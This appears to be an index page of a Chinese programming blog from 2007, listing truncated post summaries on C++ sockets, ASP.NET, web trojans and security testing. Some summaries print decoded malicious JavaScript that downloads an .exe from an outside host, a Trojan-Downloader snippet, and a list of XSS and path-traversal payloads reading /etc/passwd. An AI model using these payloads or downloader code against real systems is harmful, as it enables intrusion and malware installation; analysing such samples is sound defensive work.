上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 20 下一页
摘要: // CppSocket.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #include #include #include #include #include #include using namespace std;#define MS_SOCKET 1#ifdef... 阅读全文
posted @ 2007-08-13 09:02 阿牛 阅读(4106) 评论(2) 推荐(0)
摘要: 文件: http://xxxx.xxx.xxx/web.htm 通过解码后: function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { var mm1="http:";mm2="//";mm3="www.55dj.net/xy.exe";dl=mm1+mm2+mm... 阅读全文
posted @ 2007-08-12 20:40 阿牛 阅读(793) 评论(1) 推荐(0)
摘要: > ='> %3Cscript%3Ealert('XSS')%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/w... 阅读全文
posted @ 2007-08-09 17:47 阿牛 阅读(1543) 评论(4) 推荐(0)
摘要: 今天去移动上查看手机通话记录,习惯性的看了一下验证码,发现比上次好了一点,用我以前的文章,不好识别了. 但查看了一下图片路径,一下子就晕了.图片的路径竟然是: http://www.he.chinamobile.com/Service/MakeNewAttest?randCode=4955 发现移动太是太牛了. 佩服佩服 阅读全文
posted @ 2007-08-01 09:05 阿牛 阅读(2990) 评论(25) 推荐(0)
摘要: Author: sinisterEmail: sinister@whitecell.orgHomepage:http://www.whitecell.org Date: 2007-02-26 /*********************************************************... 阅读全文
posted @ 2007-07-20 15:43 阿牛 阅读(3816) 评论(0) 推荐(0)
摘要: 如果刚从ASP过渡到ASPX的程序员,大都会抱怨ASPX生成的客户端元素的ID,太长了!如果要在客户端脚本中使用,如利用: document.getElementById('Repeater1_ctl00_Button1') 这一类的方式来引用,非常不方便. 想像一下,你想生成如上的界面,然后在鼠标在Button上mousemove时,改变其前面对应的文本... 阅读全文
posted @ 2007-07-16 15:45 阿牛 阅读(2477) 评论(28) 推荐(0)
摘要: 在网要查了一下,要 Microsoft.Web.UI.ScriptManager.RegisterStartupScript,这个东西不好找.忽然发现原来这是Atals中的东西, 在ASP.NET AJAX 1.0 下,直接使用 System.Web.UI.ScriptManager.RegisterStartupScript(Control control, Type type... 阅读全文
posted @ 2007-07-10 14:30 阿牛 阅读(1220) 评论(0) 推荐(0)
摘要: 实现任意字符组成的任意进制的转换类 阅读全文
posted @ 2007-07-09 16:51 阿牛 阅读(2040) 评论(9) 推荐(0)
摘要: //detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.jsvar paypopupURL = "http://www.m117.cn/?f";var usingActiveX = true;function blockError(){return true;}... 阅读全文
posted @ 2007-07-08 19:54 阿牛 阅读(1109) 评论(1) 推荐(0)
摘要: 今天一个网站,忽然防火墙就提示有网页木马。恼火,决定看一下到底利用了什么漏洞?首先记下网页地址:http://evilman.cn/1.htm 先关掉所有浏览器,然后关闭防火墙, 打开记事本,CTRL+O,打开这个网页,看到如下源码: 有一段加密的函数,不过已经给出了解密算法和密码,我们修改下,然后看一下这段加密的东西到底是什么脚本: 修改最后的 .docu... 阅读全文
posted @ 2007-07-08 19:47 阿牛 阅读(1066) 评论(1) 推荐(0)
上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 20 下一页